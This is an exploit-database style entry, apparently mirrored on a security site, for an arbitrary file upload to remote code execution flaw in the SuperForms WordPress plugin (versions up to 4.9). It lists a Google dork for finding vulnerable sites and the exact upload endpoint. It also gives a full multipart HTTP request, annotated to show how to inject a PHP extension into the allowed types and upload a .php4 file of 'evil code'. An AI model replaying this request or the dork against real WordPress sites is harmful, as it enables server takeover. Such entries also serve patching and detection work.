# Exploit Title: WordPress Plugin SuperForms 4.9 - Arbitrary File Upload to Remote Code Execution # Exploit Author: ABDO10 # Date : Jan - 28 - 2021 # Google Dork : inurl:"/wp-content/plugins/super-forms/" # Vendor Homepage : https://renstillmann.github.io/super-forms/#/ # Version : All (<= 4.9.X) # data in http request : POST /wp-content/plugins/super-forms/uploads/php/ HTTP/1.1 <=== exploit end point Host: localhost User-Agent: UserAgent Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------423513681827540048931513055996 Content-Length: 7058 Origin: localhost Connection: close Referer: localhost Cookie: -----------------------------423513681827540048931513055996 Content-Disposition: form-data; name="accept_file_types" jpg|jpeg|png|gif|pdf|JPG|JPEG|PNG|GIF|PDF <======= inject extension (|PHP4) to validate file to upload -----------------------------423513681827540048931513055996 Content-Disposition: form-data; name="max_file_size" 8000000 -----------------------------423513681827540048931513055996 Content-Disposition: form-data; name="image_library" 0 -----------------------------423513681827540048931513055996 Content-Disposition: form-data; name="files[]"; filename="filename.(extension)" <==== inject code extension (.php4) for example Content-Type: application/pdf Evil codes to be uploaded -----------------------------423513681827540048931513055996-- # Uploaded Malicious File can be Found in : /wp-content/uploads/superforms/2021/01/<id>/filename.php4 u can get <id> from server reply .
Credits and Partners
All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD
